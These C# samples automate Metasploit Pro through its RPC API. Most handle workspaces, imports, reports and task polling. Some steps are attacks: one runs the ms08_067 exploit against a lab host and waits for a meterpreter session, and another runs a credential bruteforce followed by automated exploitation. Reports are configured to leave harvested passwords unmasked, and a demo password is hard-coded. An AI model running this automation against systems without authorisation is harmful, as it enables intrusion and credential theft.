/// <summary>
/// Sample program: submits an exploit task to Metasploit Pro through the RPC API
/// and prints every key/value pair of the reply.
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
public static void Main(string[] args)
{
    // The account, password and endpoint are hard-coded demo values. Outside a lab,
    // read them from configuration or a secret store so they never land in source control.
    using (var session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
    using (var manager = new MetasploitProManager(session))
    {
        // Example option hash kept from the original listing:
        // {
        //   "workspace" => "Project1",
        //   "DS_WHITELIST_HOSTS" => "192.168.0.0/24",
        //   "DS_MinimumRank" => "great",
        //   "DS_EXPLOIT_SPEED" => 5,
        //   "DS_EXPLOIT_TIMEOUT" => 2,
        //   "DS_LimitSessions" => true,
        //   "DS_MATCH_VULNS" => true,
        //   "DS_MATCH_PORTS" => true
        // }
        // NOTE(review): the example names the scope key DS_WHITELIST_HOSTS, while the code
        // below sends DS_WHITELIST. Confirm which key the API honours, because this value
        // is what restricts the task to the authorised address range.
        var exploitOptions = new Dictionary<string, object>
        {
            { "workspace", "default" },
            { "DS_WHITELIST", "192.168.1.0/24" },
            { "DS_MinimumRank", "great" },
            { "DS_EXPLOIT_SPEED", 5 },
            { "DS_EXPLOIT_TIMEOUT", 2 },
            { "DS_LimitSessions", true },
            { "DS_MATCH_VULNS", true },
            { "DS_MATCH_PORTS", true },
        };

        Dictionary<string, object> reply = manager.StartExploit(exploitOptions);

        foreach (KeyValuePair<string, object> entry in reply)
        {
            Console.WriteLine(string.Concat(entry.Key, ": ", entry.Value));
        }
    }
}
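/// <summary>
/// Sample program: asks Metasploit Pro to import a file into the "default" workspace,
/// prints the reply, then polls the task status every 500 ms until it is no longer "running".
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
public static void Main(string[] args)
{
    // The account, password and endpoint are hard-coded demo values. Outside a lab,
    // read them from configuration or a secret store so they never land in source control.
    using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        Dictionary<object, object> options = new Dictionary<object, object>();
        options.Add("workspace", "default");
        options.Add("DS_PATH", "/tmp/efc63839-ae8d-4caf-92f5-3f3ff7b6e306");

        Dictionary<object, object> importReply = manager.StartImport(options);

        foreach (var pair in importReply)
        {
            Console.WriteLine(pair.Key + ": " + pair.Value);
        }

        // Keep the task id in its own local. The original reused one variable for both the
        // import reply and the status reply, so every re-poll looked up "task_id" in the
        // status reply, which the code reads as a map of per-task dictionaries.
        string taskId = importReply["task_id"] as string;

        string state;
        do
        {
            Dictionary<object, object> statusReply = manager.GetProTaskStatus(taskId);

            state = null;
            foreach (var pair in statusReply)
            {
                // Each value is expected to be a dictionary carrying a "status" entry;
                // entries of any other shape are skipped instead of dereferenced.
                Dictionary<object, object> details = pair.Value as Dictionary<object, object>;
                if (details != null && details.ContainsKey("status"))
                {
                    state = details["status"] as string;
                }
            }

            if (state == "running")
            {
                System.Threading.Thread.Sleep(500);
            }
        }
        while (state == "running");
    }
}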
/// <summary>
/// Sample program: creates and deletes a throw-away project through the Pro API, then
/// repeats the add/list/delete cycle for a second random workspace name by typing
/// "workspace" commands into an RPC console. Replies are printed to stdout.
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
public static void Main(string[] args)
{
    // The account, password and endpoint are hard-coded demo values. Outside a lab,
    // read them from configuration or a secret store so they never land in source control.
    using (var session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
    using (var manager = new MetasploitProManager(session))
    {
        // Prints every top-level key/value pair of an RPC reply.
        Action<Dictionary<object, object>> dump = reply =>
        {
            foreach (KeyValuePair<object, object> entry in reply)
            {
                Console.WriteLine(string.Concat(entry.Key, ": ", entry.Value));
            }
        };

        // Round trip 1: structured API calls.
        string projectName = Guid.NewGuid().ToString();
        var projectOptions = new Dictionary<object, object> { { "name", projectName } };

        dump(manager.AddProProject(projectOptions));
        dump(manager.DeleteProWorkspace(projectName));

        // Round trip 2: the same operations typed into a console.
        Dictionary<object, object> console = manager.CreateConsole();
        string consoleName = Guid.NewGuid().ToString();
        string consoleID = console["id"] as string;

        // The name is a freshly generated GUID, so it cannot carry console metacharacters.
        // A caller-supplied name would need validating before being concatenated like this.
        manager.WriteToConsole(consoleID, string.Format("workspace -a {0}\n", consoleName));
        manager.WriteToConsole(consoleID, "workspace\n");
        manager.WriteToConsole(consoleID, string.Format("workspace -d {0}\n", consoleName));

        dump(manager.ReadConsole(consoleID));

        manager.DestroyConsole(consoleID);
    }
}
/// <summary>
/// Sample program: prints module statistics and version information, creates an RPC
/// console, lists all consoles, destroys the one it created, and finally prints the
/// Pro "about" and update-status replies.
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
public static void Main(string[] args)
{
    using (var session = new MetasploitSession("msfuser", "msfpass", "https://127.0.0.1:55553/"))
    using (var manager = new MetasploitProManager(session))
    {
        // Prints every top-level key/value pair of an RPC reply.
        Action<Dictionary<string, object>> dump = reply =>
        {
            foreach (KeyValuePair<string, object> entry in reply)
            {
                Console.WriteLine(string.Concat(entry.Key, ": ", entry.Value));
            }
        };

        Dictionary<string, object> moduleStats = manager.GetCoreModuleStats();
        Console.WriteLine("Module stats:");
        dump(moduleStats);

        Dictionary<string, object> coreVersion = manager.GetCoreVersionInformation();
        Console.WriteLine("\n\nVersion information:");
        dump(coreVersion);

        Console.WriteLine("\n\nCreating console...");
        Dictionary<string, object> created = manager.CreateConsole();
        dump(created);

        string consoleID = created["id"] as string;

        Console.WriteLine("\n\nConsole created, getting list of consoles...");
        Dictionary<string, object> consoles = manager.ListConsoles();

        foreach (KeyValuePair<string, object> group in consoles)
        {
            Console.WriteLine(string.Concat("\n", group.Key, ":"));

            // Each element of the list is a Dictionary<string, object> in this response.
            foreach (object item in (group.Value as IList<object>))
            {
                foreach (KeyValuePair<string, object> field in item as Dictionary<string, object>)
                {
                    Console.WriteLine(string.Concat(field.Key, ": ", field.Value));
                }
            }
        }

        Console.WriteLine(string.Concat("\n\nDestroying our console: ", consoleID));
        Dictionary<string, object> destroyed = manager.DestroyConsole(consoleID);
        dump(destroyed);

        // The console counts as destroyed only when the reply carries result == "success".
        object outcome;
        bool succeeded = destroyed.TryGetValue("result", out outcome) && ((string)outcome) == "success";
        Console.WriteLine(succeeded ? "Destroyed." : "Failed!");

        Dictionary<string, object> aboutPro = manager.AboutPro();
        Console.WriteLine("\n\nInformation about pro:");
        dump(aboutPro);

        Dictionary<string, object> updateState = manager.ProUpdateStatus();
        Console.WriteLine("\n\nUpdate status:");
        dump(updateState);
    }
}
/// <summary>
/// Sample program: drives an RPC console with fixed "use"/"set"/"exploit" commands
/// separated by fixed sleeps, echoes the console output until the console is idle or
/// the prompt contains "meterpreter", then prints the session list and destroys the console.
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
/// <exception cref="Exception">Thrown when the session holds no token after login.</exception>
public static void Main(string[] args)
{
    // The account, password, endpoint and target address are hard-coded lab values.
    // Outside a lab, read the credentials from configuration or a secret store.
    using (var session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
    {
        // An empty token means authentication did not succeed, so stop before any RPC call.
        if (string.IsNullOrEmpty(session.Token))
        {
            throw new Exception("Login failed. Check credentials");
        }

        using (var manager = new MetasploitProManager(session))
        {
            // Alternative kept from the original listing (module executed through the API
            // instead of the console):
            // Dictionary<object, object> options = new Dictionary<object, object>();
            // options.Add("RHOST", "192.168.1.129");
            // options.Add("RPORT", "445");
            // options.Add("LPORT", new Random().Next(1001, 50000));
            //
            // Dictionary<object, object> response = manager.ExecuteModule("exploit", "windows/smb/ms08_067_netapi", options);
            //
            // foreach (KeyValuePair<object, object> pair in response)
            //     Console.WriteLine(pair.Key + ": " + pair.Value);

            var reply = manager.CreateConsole();

            foreach (var entry in reply)
            {
                Console.WriteLine(string.Concat(entry.Key, ": ", entry.Value));
            }

            string consoleID = reply["id"] as string;

            Console.WriteLine("Setting up options...");

            // Each command is followed by a fixed pause; the replies are not inspected.
            reply = manager.WriteToConsole(consoleID, "use exploit/windows/smb/ms08_067_netapi\n");
            System.Threading.Thread.Sleep(6000);

            reply = manager.WriteToConsole(consoleID, "set RHOST 192.168.1.129\n");
            System.Threading.Thread.Sleep(6000);

            reply = manager.WriteToConsole(consoleID, string.Concat("set LPORT ", new Random().Next(1001, 50000), "\n"));
            System.Threading.Thread.Sleep(6000);

            Console.WriteLine("Exploiting...");

            reply = manager.WriteToConsole(consoleID, "exploit\n");
            System.Threading.Thread.Sleep(12000);

            // NOTE(review): this loop re-reads the console with no delay between polls, and
            // the console is not destroyed if anything inside it throws.
            bool stillBusy;
            do
            {
                reply = manager.ReadConsole(consoleID);

                foreach (var entry in reply)
                {
                    Console.WriteLine(string.Concat(entry.Key, ": ", entry.Value));
                }

                stillBusy = bool.Parse(reply["busy"].ToString());

                string prompt = reply["prompt"] as string;
                if (prompt.Contains("meterpreter"))
                {
                    break;
                }
            }
            while (stillBusy);

            reply = manager.ListSessions();

            foreach (var sessionEntry in reply)
            {
                foreach (var field in sessionEntry.Value as Dictionary<object, object>)
                {
                    Console.WriteLine(string.Concat(field.Key, ": ", field.Value));
                }
            }

            manager.DestroyConsole(consoleID);
        }
    }
}
/// <summary>
/// Asks Metasploit Pro for the status of one task and reports whether it is still running.
/// </summary>
/// <param name="msfProScanID">Task id passed to <c>GetProTaskStatus</c>.</param>
/// <returns><c>true</c> when the first entry of the reply has status "running"; otherwise <c>false</c>.</returns>
/// <exception cref="Exception">Thrown with the server's "error_message" when the reply contains an "error" key.</exception>
private bool MetasploitProAssessmentIsRunning(string msfProScanID)
{
    // Credentials and host come from the instance configuration; the port and API path are fixed.
    var user = this.Configuration["metasploitUser"];
    var password = this.Configuration["metasploitPass"];
    var endpoint = "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1";

    using (var session = new MetasploitSession(user, password, endpoint))
    using (var manager = new MetasploitProManager(session))
    {
        Dictionary<string, object> reply = manager.GetProTaskStatus(msfProScanID);

        if (reply.ContainsKey("error"))
        {
            throw new Exception(reply["error_message"] as string);
        }

        // The reply is read as a map whose first value is the task's own dictionary.
        var task = reply.First().Value as Dictionary<string, object>;
        string state = task["status"] as string;

        return state == "running";
    }
}
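/// <summary>
/// Starts a Metasploit Pro import of <paramref name="filename"/> into
/// <paramref name="workspace"/> and blocks, polling once a minute, until the import
/// task is no longer reported as "running".
/// </summary>
/// <param name="filename">Path sent as the DS_PATH option. Presumably it must be readable by the Metasploit Pro service; confirm.</param>
/// <param name="workspace">Workspace that receives the imported data.</param>
/// <returns>Always <c>true</c> once polling ends; the task's final status is not inspected.</returns>
/// <exception cref="Exception">Thrown with the server's "error_message" when the import request is rejected.</exception>
private bool ImportFileIntoMetasploitPro(string filename, string workspace)
{
    using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"], this.Configuration["metasploitPass"], "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        Dictionary<string, object> options = new Dictionary<string, object>();
        options.Add("workspace", workspace);
        options.Add("DS_PATH", filename);
        options.Add("preserve_hosts", true);

        Dictionary<string, object> response = manager.StartImport(options);

        foreach (var pair in response)
        {
            Console.WriteLine(pair.Key + ": " + pair.Value);
        }

        // Same error convention as MetasploitProAssessmentIsRunning: surface the server's
        // message instead of failing later on a missing "task_id" key.
        if (response.ContainsKey("error"))
        {
            throw new Exception(response["error_message"] as string);
        }

        string taskId = response["task_id"] as string;

        // The status reply is read as a map whose first value is the task's own dictionary.
        Dictionary<string, object> task = manager.GetProTaskStatus(taskId).First().Value as Dictionary<string, object>;

        while (task["status"] as string == "running")
        {
            Console.WriteLine("Waiting on file import: " + filename);
            Thread.Sleep(TimeSpan.FromSeconds(60));

            task = manager.GetProTaskStatus(taskId).First().Value as Dictionary<string, object>;
        }

        return true;
    }
}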
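/// <summary>
/// Generates an XML report for <paramref name="workspace"/>, waits (polling once a
/// minute) until the report task stops running, downloads the report and returns the
/// last child node of the parsed document.
/// </summary>
/// <param name="workspace">Workspace to report on.</param>
/// <returns>The last child of the downloaded report document.</returns>
/// <exception cref="Exception">Thrown with the server's "error_message" when the report request is rejected.</exception>
/// <remarks>
/// The request sets DS_MaskPasswords and DS_LootExcludePasswords to false. Going by the
/// option names, the report presumably contains collected credentials in clear text
/// (confirm against the API documentation), so treat the returned node as sensitive data.
/// </remarks>
private XmlNode GetMetasploitProReport(string workspace)
{
    Console.WriteLine("Generating report for workspace: " + workspace);

    string reportXml = string.Empty;

    using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"], this.Configuration["metasploitPass"], "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        Dictionary<string, object> options = new Dictionary<string, object>();
        options.Add("DS_WHITELIST_HOSTS", string.Empty);
        options.Add("DS_BLACKLIST_HOSTS", string.Empty);
        options.Add("workspace", workspace);
        options.Add("DS_MaskPasswords", false);
        options.Add("DS_IncludeTaskLog", false);
        options.Add("DS_JasperDisplaySession", true);
        options.Add("DS_JasperDisplayCharts", true);
        options.Add("DS_LootExcludeScreenshots", false);
        options.Add("DS_LootExcludePasswords", false);
        options.Add("DS_JasperTemplate", "msfxv3.jrxml");
        options.Add("DS_REPORT_TYPE", "XML");
        options.Add("DS_UseJasper", true);
        options.Add("DS_UseCustomReporting", true);
        options.Add("DS_JasperProductName", "AutoAssess");
        options.Add("DS_JasperDbEnv", "production");
        options.Add("DS_JasperLogo", string.Empty);
        options.Add("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
        // NOTE(review): the key is spelled "Enabel" here; confirm the exact option name the API expects.
        options.Add("DS_EnabelPCIReport", true);
        options.Add("DS_EnableFISMAReport", true);
        options.Add("DS_JasperDisplayWeb", true);

        Dictionary<string, object> response = manager.StartReport(options);

        // Same error convention as MetasploitProAssessmentIsRunning: surface the server's
        // message instead of failing later on a missing "task_id" key.
        if (response.ContainsKey("error"))
        {
            throw new Exception(response["error_message"] as string);
        }

        string taskId = response["task_id"] as string;

        // The status reply is read as a map whose first value is the task's own dictionary.
        Dictionary<string, object> task = manager.GetProTaskStatus(taskId).First().Value as Dictionary<string, object>;

        while (task["status"] as string == "running")
        {
            Console.WriteLine("Waiting on metasploit report");
            Thread.Sleep(TimeSpan.FromSeconds(60));

            task = manager.GetProTaskStatus(taskId).First().Value as Dictionary<string, object>;
        }

        response = manager.DownloadReportByTask(taskId);
        reportXml = response["data"] as string;
    }

    XmlDocument doc = new XmlDocument();

    // The report embeds data gathered from scanned hosts, so parse it as untrusted input:
    // with no resolver, external DTDs and external entities are never fetched.
    doc.XmlResolver = null;
    doc.LoadXml(reportXml);

    return doc.LastChild;
}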
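/// <summary>
/// Creates a Metasploit workspace by typing <c>workspace -a "name"</c> into a temporary
/// RPC console, waits 30 seconds, issues a bare <c>workspace</c> command and destroys
/// the console.
/// </summary>
/// <param name="workspace">Name of the workspace to create.</param>
/// <exception cref="ArgumentException">
/// Thrown when <paramref name="workspace"/> is null or empty, or contains a double quote,
/// a backslash or a control character.
/// </exception>
private void CreateNewMetasploitWorkspace(string workspace)
{
    // The name is spliced into a console command line. A quote, a backslash or a
    // newline could end the quoted argument or begin a second command, so reject them
    // before any console is opened. If the valid character set for workspace names is
    // known, an allow-list would be stricter than this deny-list.
    if (string.IsNullOrEmpty(workspace))
    {
        throw new ArgumentException("Workspace name must not be empty.", "workspace");
    }

    foreach (char c in workspace)
    {
        if (c == '"' || c == '\\' || char.IsControl(c))
        {
            throw new ArgumentException("Workspace name contains a quote, backslash or control character.", "workspace");
        }
    }

    using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"], this.Configuration["metasploitPass"], "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        // The original listing carried a commented-out variant that passed a "name"
        // option to manager.AddProWorkspace(options). If that call is usable, it avoids
        // building a console command from the name at all.
        Dictionary<string, object> response = manager.CreateConsole();
        string consoleID = response["id"] as string;

        try
        {
            manager.WriteToConsole(consoleID, "workspace -a \"" + workspace + "\"\n");

            Thread.Sleep(TimeSpan.FromSeconds(30));

            manager.WriteToConsole(consoleID, "workspace \n");
        }
        finally
        {
            // Release the console even when a write fails, so it is not left open on the server.
            manager.DestroyConsole(consoleID);
        }
    }
}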
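/// <summary>
/// Runs the Metasploit Pro assessment pipeline for a workspace: host discovery, then
/// (only when <paramref name="bruteforce"/> is true) a credential bruteforce pass, then
/// an exploit task. Discovery and bruteforce are awaited by polling; the exploit task
/// is started and its id returned without waiting.
/// </summary>
/// <param name="workspace">Workspace in which the tasks run.</param>
/// <param name="whitelist">Host scope sent with the bruteforce and exploit tasks.</param>
/// <param name="bruteforce">Whether to run the bruteforce stage.</param>
/// <returns>The "task_id" of the exploit task.</returns>
/// <remarks>
/// The original condition was <c>if (true)</c> with <c>if (bruteforce)</c> commented out,
/// so the bruteforce stage ran even when the caller opted out. The flag is honoured here.
/// </remarks>
private string BeginMetasploitProAssessment(string workspace, string whitelist, bool bruteforce)
{
    using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"], this.Configuration["metasploitPass"], "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        Dictionary<string, object> options = new Dictionary<string, object>();
        Dictionary<string, object> response;

        // NOTE(review): `csv` (and `services` below) are neither parameters nor locals of
        // this method; presumably they are members of the enclosing class. Discovery is
        // scoped by `csv` while the later stages are scoped by `whitelist`; confirm that
        // both describe the same authorised hosts.
        object hosts = csv.Split(',');

        options.Add("ips", hosts);
        options.Add("workspace", workspace);

        Console.WriteLine("Discovering...");

        response = manager.StartDiscover(options);
        string discoverTaskId = response["task_id"] as string;

        // The status reply is read as a map whose first value is the task's own dictionary.
        Dictionary<string, object> taskResponse = manager.GetProTaskStatus(discoverTaskId).First().Value as Dictionary<string, object>;

        while (taskResponse["status"] as string == "running")
        {
            Console.WriteLine("Waiting on metasploit discovery");
            Thread.Sleep(TimeSpan.FromSeconds(60));

            taskResponse = manager.GetProTaskStatus(discoverTaskId).First().Value as Dictionary<string, object>;
        }

        if (bruteforce)
        {
            // Translate the configured service names into the space-separated labels sent
            // as DS_BRUTEFORCE_SERVICES. Unrecognised names are skipped.
            string svcs = string.Empty;

            foreach (string service in services)
            {
                switch (service)
                {
                    case "postgresql": svcs += "Postgresql "; break;
                    case "mysql": svcs += "MySQL "; break;
                    case "mssql": svcs += "MSSQL "; break;
                    case "oracle": svcs += "Oracle "; break;
                    case "http": svcs += "HTTP "; break;
                    case "https": svcs += "HTTPS "; break;
                    case "ssh": svcs += "SSH "; break;
                    case "telnet": svcs += "Telnet "; break;
                    case "ftp": svcs += "FTP "; break;
                    case "exec": svcs += "EXEC "; break;
                    case "shell": svcs += "SHELL "; break;
                    case "vnc": svcs += "VNC "; break;
                }
            }

            Console.WriteLine("Bruteforcing...");

            options = new Dictionary<string, object>();
            options.Add("workspace", workspace);
            options.Add("DS_WHITELIST_HOSTS", whitelist);
            options.Add("DS_BRUTEFORCE_SCOPE", "quick");
            options.Add("DS_BRUTEFORCE_SERVICES", svcs);
            options.Add("DS_BRUTEFORCE_SPEED", "TURBO");
            options.Add("DS_INCLUDE_KNOWN", true);
            options.Add("DS_BRUTEFORCE_GETSESSION", true);

            response = manager.StartBruteforce(options);
            string bruteTaskId = response["task_id"] as string;

            taskResponse = manager.GetProTaskStatus(bruteTaskId).First().Value as Dictionary<string, object>;

            while (taskResponse["status"] as string == "running")
            {
                Console.WriteLine("Waiting on metasploit bruteforce");
                Thread.Sleep(TimeSpan.FromSeconds(30));

                taskResponse = manager.GetProTaskStatus(bruteTaskId).First().Value as Dictionary<string, object>;
            }
        }

        // NOTE(review): the bruteforce stage sends the scope as DS_WHITELIST_HOSTS, while this
        // stage sends DS_WHITELIST. Confirm which key the exploit task honours, because
        // this value is what restricts the task to the authorised hosts.
        options = new Dictionary<string, object>();
        options.Add("workspace", workspace);
        options.Add("DS_WHITELIST", whitelist);
        options.Add("DS_MinimumRank", "great");
        options.Add("DS_EXPLOIT_SPEED", 5);
        options.Add("DS_EXPLOIT_TIMEOUT", 2);
        options.Add("DS_LimitSessions", false);
        options.Add("DS_MATCH_VULNS", true);
        options.Add("DS_MATCH_PORTS", true);

        response = manager.StartExploit(options);

        foreach (var pair in response)
        {
            Console.WriteLine(pair.Key + ": " + pair.Value);
        }

        return response["task_id"] as string;
    }
}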
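/// <summary>
/// Sample program: requests a PDF report for the "default" workspace, prints the reply,
/// then prints the task status repeatedly until the task is no longer "running".
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
/// <remarks>
/// The request sets DS_MaskPasswords and DS_LootExcludePasswords to false. Going by the
/// option names, the report presumably contains collected credentials in clear text
/// (confirm against the API documentation), so store and share the output accordingly.
/// </remarks>
public static void Main(string[] args)
{
    // The account, password and endpoint are hard-coded demo values. Outside a lab,
    // read them from configuration or a secret store so they never land in source control.
    using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
    using (MetasploitProManager manager = new MetasploitProManager(session))
    {
        Dictionary<string, object> options = new Dictionary<string, object>();
        options.Add("DS_WHITELIST_HOSTS", string.Empty);
        options.Add("DS_BLACKLIST_HOSTS", string.Empty);
        options.Add("workspace", "default");
        options.Add("DS_MaskPasswords", false);
        options.Add("DS_IncludeTaskLog", false);
        options.Add("DS_JasperDisplaySession", true);
        options.Add("DS_JasperDisplayCharts", true);
        options.Add("DS_LootExcludeScreenshots", false);
        options.Add("DS_LootExcludePasswords", false);
        options.Add("DS_JasperTemplate", "msfxv3.jrxml");
        options.Add("DS_REPORT_TYPE", "PDF");
        options.Add("DS_UseJasper", true);
        options.Add("DS_UseCustomReporting", true);
        options.Add("DS_JasperProductName", "AutoAssess");
        options.Add("DS_JasperDbEnv", "production");
        options.Add("DS_JasperLogo", string.Empty);
        options.Add("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
        // NOTE(review): "Enabel" and the capital "I" in "DIsplayWeb" look like typos; confirm
        // the exact option names the API expects before relying on these two settings.
        options.Add("DS_EnabelPCIReport", true);
        options.Add("DS_EnableFISMAReport", true);
        options.Add("DS_JasperDIsplayWeb", true);

        Dictionary<string, object> response = manager.StartReport(options);

        foreach (var pair in response)
        {
            Console.WriteLine(pair.Key + ": " + pair.Value);
        }

        string taskID = response["task_id"] as string;

        response = manager.GetProTaskStatus(taskID);

        bool done = false;
        while (!done)
        {
            string status = string.Empty;

            // The status reply is read as a map of task dictionaries; print each one and
            // remember the status of the last.
            foreach (var pair in response)
            {
                Console.WriteLine(pair.Key + ":");

                foreach (var p in pair.Value as Dictionary<string, object>)
                {
                    Console.WriteLine(p.Key + ": " + p.Value);
                }

                status = (pair.Value as Dictionary<string, object>)["status"] as string;
            }

            if (status != "running")
            {
                done = true;
                Console.WriteLine("Done!");
            }
            else
            {
                Console.WriteLine("Not done yet...");

                // Pause between polls; the original re-queried the API in a tight loop.
                System.Threading.Thread.Sleep(500);

                response = manager.GetProTaskStatus(taskID);
            }
        }
    }
}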